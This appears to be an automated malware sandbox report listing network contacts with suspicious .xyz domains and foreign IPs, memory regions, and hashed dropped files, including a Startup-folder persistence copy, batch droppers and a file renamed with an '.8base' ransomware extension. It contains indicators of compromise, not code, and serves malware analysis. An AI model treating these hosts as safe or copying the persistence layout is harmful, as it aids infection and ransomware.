RU 91.215.85.210:42902 91.215.85.210 tcp
US 8.8.8.8:53 210.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 dexstat255.xyz udp
DE 185.234.72.142:46578 dexstat255.xyz tcp
US 8.8.8.8:53 142.72.234.185.in-addr.arpa udp
US 8.8.8.8:53 fexstat27.xyz udp
DE 5.182.207.8:80 fexstat27.xyz tcp
US 8.8.8.8:53 8.207.182.5.in-addr.arpa udp
US 20.42.73.25:443 tcp
US 8.8.8.8:53 serverlogs37.xyz udp
US 8.8.8.8:53 servblog757.xyz udp
DE 45.89.127.159:80 servblog757.xyz tcp
IT 179.43.162.58:80 179.43.162.58 tcp
US 8.8.8.8:53 dexsel29.xyz udp
EE 159.253.18.136:80 dexsel29.xyz tcp
US 8.8.8.8:53 159.127.89.45.in-addr.arpa udp
US 8.8.8.8:53 58.162.43.179.in-addr.arpa udp
US 8.8.8.8:53 136.18.253.159.in-addr.arpa udp
NL 145.14.157.71:80 145.14.157.71 tcp
US 8.8.8.8:53 71.157.14.145.in-addr.arpa udp
US 8.8.8.8:53 45.8.109.52.in-addr.arpa udp
DE 45.89.127.159:80 servblog757.xyz tcp
NL 178.79.208.1:80 tcp

Files

memory/2228-133-0x0000000000CC0000-0x0000000000D0C000-memory.dmp

memory/2228-134-0x0000000005AA0000-0x0000000006044000-memory.dmp

memory/2228-135-0x0000000005590000-0x0000000005622000-memory.dmp

memory/2228-136-0x0000000005640000-0x000000000564A000-memory.dmp

memory/2228-137-0x0000000005520000-0x0000000005530000-memory.dmp

memory/2176-138-0x00000000046F0000-0x0000000004726000-memory.dmp

memory/2176-139-0x0000000004D60000-0x0000000005388000-memory.dmp

memory/2176-140-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

memory/2176-141-0x0000000005390000-0x00000000053F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdfjcnn0.tct.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2176-144-0x0000000005630000-0x0000000005696000-memory.dmp

memory/2176-152-0x00000000046E0000-0x00000000046F0000-memory.dmp

memory/2176-153-0x00000000046E0000-0x00000000046F0000-memory.dmp

memory/2176-154-0x0000000005C70000-0x0000000005C8E000-memory.dmp

memory/2176-155-0x00000000061F0000-0x0000000006234000-memory.dmp

memory/2176-156-0x0000000006F60000-0x0000000006FD6000-memory.dmp

memory/2176-157-0x00000000046E0000-0x00000000046F0000-memory.dmp

memory/2176-158-0x0000000007660000-0x0000000007CDA000-memory.dmp

memory/2176-159-0x0000000007000000-0x000000000701A000-memory.dmp

memory/2176-160-0x0000000007D50000-0x0000000007D72000-memory.dmp

memory/4716-161-0x0000000000400000-0x0000000000430000-memory.dmp

memory/2176-162-0x00000000046E0000-0x00000000046F0000-memory.dmp

memory/4716-163-0x0000000018B70000-0x0000000019188000-memory.dmp

memory/4716-164-0x0000000018660000-0x000000001876A000-memory.dmp

memory/4716-165-0x00000000183A0000-0x00000000183B2000-memory.dmp

memory/4716-166-0x0000000018400000-0x000000001843C000-memory.dmp

memory/4716-167-0x0000000018440000-0x0000000018450000-memory.dmp

memory/2228-168-0x0000000005520000-0x0000000005530000-memory.dmp

memory/2176-170-0x00000000046E0000-0x00000000046F0000-memory.dmp

memory/2176-169-0x00000000046E0000-0x00000000046F0000-memory.dmp

memory/2176-171-0x00000000046E0000-0x00000000046F0000-memory.dmp

memory/2176-173-0x00000000046E0000-0x00000000046F0000-memory.dmp

memory/4716-174-0x0000000018440000-0x0000000018450000-memory.dmp

memory/4716-175-0x000000001B1C0000-0x000000001B382000-memory.dmp

memory/4716-176-0x000000001B8C0000-0x000000001BDEC000-memory.dmp

memory/4716-177-0x0000000019BB0000-0x0000000019C00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

MD5 a780dd7a5ed788b79d157339f69bbad4
SHA1 7e10cd37e03420947d45c0374b05f23e058731e9
SHA256 78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778
SHA512 e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

MD5 a780dd7a5ed788b79d157339f69bbad4
SHA1 7e10cd37e03420947d45c0374b05f23e058731e9
SHA256 78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778
SHA512 e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

MD5 a780dd7a5ed788b79d157339f69bbad4
SHA1 7e10cd37e03420947d45c0374b05f23e058731e9
SHA256 78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778
SHA512 e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

C:\Users\Admin\AppData\Local\Temp\s777mx.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

C:\Users\Admin\AppData\Local\Temp\s777mx.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

C:\Users\Admin\AppData\Local\Temp\s777mx.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

memory/3428-204-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

MD5 a780dd7a5ed788b79d157339f69bbad4
SHA1 7e10cd37e03420947d45c0374b05f23e058731e9
SHA256 78ad9e5dbc080327aa2b725b3278a9c53c85099ba86807b7943f11da1127c778
SHA512 e8da669acd35969e767fe475b387495122dfc6f208636a648a9213a1e7b7891d6e64ba2260d0a018f0e4f4d94f67ce126b8006795062837dff88f93a56b469dd

memory/1856-206-0x0000000003630000-0x0000000003639000-memory.dmp

memory/3420-208-0x0000000001BB0000-0x0000000001BB5000-memory.dmp

memory/3428-209-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3292-211-0x0000000002AB0000-0x0000000002AC6000-memory.dmp

memory/3428-212-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3420-216-0x0000000000400000-0x0000000001B38000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3C2E.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

C:\Users\Admin\AppData\Local\Temp\3C2E.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

memory/2992-228-0x000002BC689A0000-0x000002BC68B0A000-memory.dmp

memory/2992-229-0x000002BC6A790000-0x000002BC6A7A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

MD5 8a62691e9921ee88ab036aba6f9e45eb
SHA1 288d8268254bf799aef8db58beb18cb35fd903a1
SHA256 a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5
SHA512 75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

MD5 8a62691e9921ee88ab036aba6f9e45eb
SHA1 288d8268254bf799aef8db58beb18cb35fd903a1
SHA256 a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5
SHA512 75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

memory/2992-234-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-235-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-237-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-239-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-241-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-243-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-245-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-247-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-249-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/3280-253-0x0000000001C40000-0x0000000001C4F000-memory.dmp

memory/2992-254-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\42D7.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

C:\Users\Admin\AppData\Local\Temp\42D7.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

memory/2992-259-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-261-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-263-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

MD5 8a62691e9921ee88ab036aba6f9e45eb
SHA1 288d8268254bf799aef8db58beb18cb35fd903a1
SHA256 a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5
SHA512 75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

memory/2992-266-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-268-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-270-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-272-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-275-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-277-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-279-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-284-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-281-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-286-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-288-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-290-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-294-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-292-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

memory/2992-296-0x000002BC6AF80000-0x000002BC6B0B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\547C.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

C:\Users\Admin\AppData\Local\Temp\547C.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

memory/1424-396-0x0000000000FF0000-0x000000000164E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll

MD5 5f449db8083ca4060253a0b4f40ff8ae
SHA1 2b77b8c86fda7cd13d133c93370ff302cd08674b
SHA256 7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
SHA512 4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll

MD5 5f449db8083ca4060253a0b4f40ff8ae
SHA1 2b77b8c86fda7cd13d133c93370ff302cd08674b
SHA256 7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
SHA512 4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

memory/4248-426-0x0000000001370000-0x00000000013F0000-memory.dmp

memory/1424-424-0x0000000006070000-0x0000000006080000-memory.dmp

memory/4248-432-0x0000000001300000-0x000000000136B000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\3EBF.exe

MD5 8a62691e9921ee88ab036aba6f9e45eb
SHA1 288d8268254bf799aef8db58beb18cb35fd903a1
SHA256 a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5
SHA512 75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

memory/1424-439-0x00000000707B0000-0x0000000070D90000-memory.dmp

memory/1644-445-0x0000000000630000-0x000000000063C000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[CF072F13-3483].[[email protected]].8base

MD5 4be32a0a4eabdf02dffc15ff149a189a
SHA1 5391390845c9f728a42809d547fafe8aa794e2aa
SHA256 abc142eacf656930c30c7c0610952a0dbd57f44f60bcf642b5141fd628fef99d
SHA512 1996aab5b64d44c0e784365ab587fb5cfb510a2b543c9f7b495579f70031f671933b6d085cb94ef13f07c72d67a349b684b4a528829ccd69f854509e7c07c4a8

memory/4256-703-0x0000000000630000-0x000000000063C000-memory.dmp

memory/4940-739-0x0000000000AF0000-0x0000000000AFB000-memory.dmp

memory/4248-725-0x0000000001300000-0x000000000136B000-memory.dmp

memory/4256-758-0x0000000001300000-0x0000000001309000-memory.dmp

memory/4500-915-0x0000000001300000-0x0000000001309000-memory.dmp

memory/4500-918-0x0000000001300000-0x000000000130B000-memory.dmp

memory/544-930-0x0000000001300000-0x000000000130B000-memory.dmp

memory/544-954-0x00000000001A0000-0x00000000001AF000-memory.dmp

memory/2992-1317-0x000002BC6A790000-0x000002BC6A7A0000-memory.dmp

memory/4776-1340-0x0000000001300000-0x0000000001309000-memory.dmp

memory/4696-1500-0x0000000001300000-0x0000000001309000-memory.dmp

memory/4696-1502-0x0000000000430000-0x000000000043C000-memory.dmp

memory/2500-1656-0x0000000000430000-0x000000000043C000-memory.dmp

memory/2500-1658-0x0000000000B40000-0x0000000000B49000-memory.dmp

memory/4340-1835-0x00000000001B0000-0x00000000001B9000-memory.dmp

memory/4380-1893-0x00000000001B0000-0x00000000001B9000-memory.dmp

memory/4340-1822-0x0000000000B40000-0x0000000000B49000-memory.dmp

memory/4380-1922-0x0000000000370000-0x0000000000397000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\547C.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

C:\Users\Admin\AppData\Local\Temp\sv.bat

MD5 ca039530887fa8dce08b07808582c4c7
SHA1 15b27c115ecf430bb3adccba408e6cdd6b94945c
SHA256 567b3fbd05b70248c6961e4cf5fc0196ae3f84d190402ca0d72e849007baf393
SHA512 9e7c3f51791c4c6aaa745622ae698cec04a75cbc716b267b4f258d599f56befab3d7142e2ce6dcac4d46d444fe2225c987ba1662788e47c39eb8538b7ab050d8

C:\Users\Admin\AppData\Local\Temp\SRD.bat

MD5 809325b0bf02d5f44ce3d005b018cc12
SHA1 c39206a6b0e5dfaf5d4a50c5887b8400d55eda87
SHA256 136c478f4bd8baf478b13a43d31d62d69669c40453ca3fe81ddfebe2ff6ab0c4
SHA512 a8b1ee15056f625ebe89a9968b2820c7bad7fc76197f705d785ecee78fbe93355cae2d784cadfdf68fc23533ab2bc8e3bd67de9e1bba07b1c4f5d6c3529a7473

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 3337d66209faa998d52d781d0ff2d804
SHA1 6594b85a70f998f79f43cdf1ca56137997534156
SHA256 9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA512 8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 34d461b8b826e81426975ca16787672f
SHA1 82737839fcf9e0f0eca8a879035ea512fd2edaa4
SHA256 45f4b6bf317f54ca9f783d88793ffd40ea9b43f3d89ac3d4c494031945a03705
SHA512 1891e62ecff1cc6b96b9834358a07dd33818e8f4f42f67967fdc72da5cf68df6bb8d7ac26e1401aef51af480514e7ee5582cc0af7abfbc879597ffc2e8d6f89e

C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 05485a4a4a5bf5010ecfaacfbded0e59
SHA1 06791a9950fc9b36f508c03d170152708f749efd
SHA256 cf7243dfd9c76a26c03b2d267ddd762a73b96e3dbd1d32515c9a00f276406d13
SHA512 b526bc16f39d884a87782da55392f5c2e763d313928e84e338a0052c33345c1beab609c364f66db90e7e7acdde1bfa601a1d816084adee5745afba7b319bd429

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 bf0a14f208d096d00509ceeb270c4be6
SHA1 182d7e4a6e1996a85a12f49fcfd1cc0f5f00495d
SHA256 1e32e5c0ffd9fb6acabd829589044d5735e55f8464a14788ba59ae5c50f3bb31
SHA512 a3224238dfde7d20ad703e84b0c0e0f7dc6bfc007dee7a1dc469537b57d4ae1ef2ac81e33a537f929cce053f5022da2a85fe2143b22bdb32914e17f046184d1b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 bf0a14f208d096d00509ceeb270c4be6
SHA1 182d7e4a6e1996a85a12f49fcfd1cc0f5f00495d
SHA256 1e32e5c0ffd9fb6acabd829589044d5735e55f8464a14788ba59ae5c50f3bb31
SHA512 a3224238dfde7d20ad703e84b0c0e0f7dc6bfc007dee7a1dc469537b57d4ae1ef2ac81e33a537f929cce053f5022da2a85fe2143b22bdb32914e17f046184d1b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a51d636f6d2d422ce072fe927aacbe3
SHA1 161a11fff5e9bebcb6a7a0263c6e7a18274a5209
SHA256 d5bc50684315205c5c745348d39cff2351d0e6bf2e79774bd35c7732465876a9
SHA512 8426fcf1edf5b3f49ad32825e455bb5580caf65ce8ee01b16c8410d56e31cc3e9dce19178fa89e3a921e35838552a53f1e0cf29b3e16cbc99c0600e9327262d2